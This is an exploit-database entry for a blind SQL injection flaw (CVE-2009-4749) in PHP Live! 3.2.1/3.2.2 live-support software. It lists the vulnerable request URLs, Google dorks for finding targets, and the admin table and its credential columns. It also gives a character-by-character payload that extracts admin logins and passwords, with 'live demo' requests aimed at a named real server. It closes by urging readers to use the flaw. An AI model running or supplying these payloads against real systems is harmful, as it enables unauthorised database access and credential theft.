EXPLOITS

PHP Live! 3.2.1/2 - 'x' Blind SQL Injection

Author: boom3rang
type: webapps
platform: php
port: 
date_added: 2009-07-15  
date_updated: 2016-11-11  
verified: 1  
codes: OSVDB-63310;CVE-2009-4749;OSVDB-63309  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9174.txt  

  PhpLive 3.2.1/2 (x) Blind SQL injection                                       [_][-][X]
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/


      Red n'black i dress eagle on my chest.
      It's good to be an ALBANIAN Keep my head up high for that flag i die.
      Im proud to be an ALBANIAN
   ###################################################################

       Author         	: boom3rang
       Contact        	: boom3rang[at]live.com
       Greetz   	: H!tm@N - KHG - cHs

		  R.I.P redc00de
   -------------------------------------------------------------------

                  Affected software description
       Software 	: PhpLive
       Vendor		: http://www.phplivesupport.com
       Price 	      	: Live Support Download Starts at $89.95
       Version Vuln.    : v3.2.1 & v3.2.2
   -------------------------------------------------------------------

    [~] SQLi :

    http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]
    http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]


    [~]Google Dork :

    Powered by PHP Live! v3.2.1
    Powered by PHP Live! v3.2.2
    allinurl:"request.php" "deptid"

   -------------------------------------------------------------------

    [~] Table_NAME  =  chat_admin
    [~] Column_NAME =  login - password - email - userID - name
   -------------------------------------------------------------------

    [~] Admin Path :

    http://www.TARGET.com/phplive
   -------------------------------------------------------------------
    [~] Live Demo:

    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1    --> True
    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2    --> False

   -------------------------------------------------------------------

    [~] ASCII

  /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100

   -------------------------------------------------------------------

    [~] Live Demo ASCII

      True
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48

      False
   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127

   ============================================================================
   | USE this vulnerability, to improve your skills for Social Engineering  ;)  |
   ============================================================================

# milw0rm.com [2009-07-16]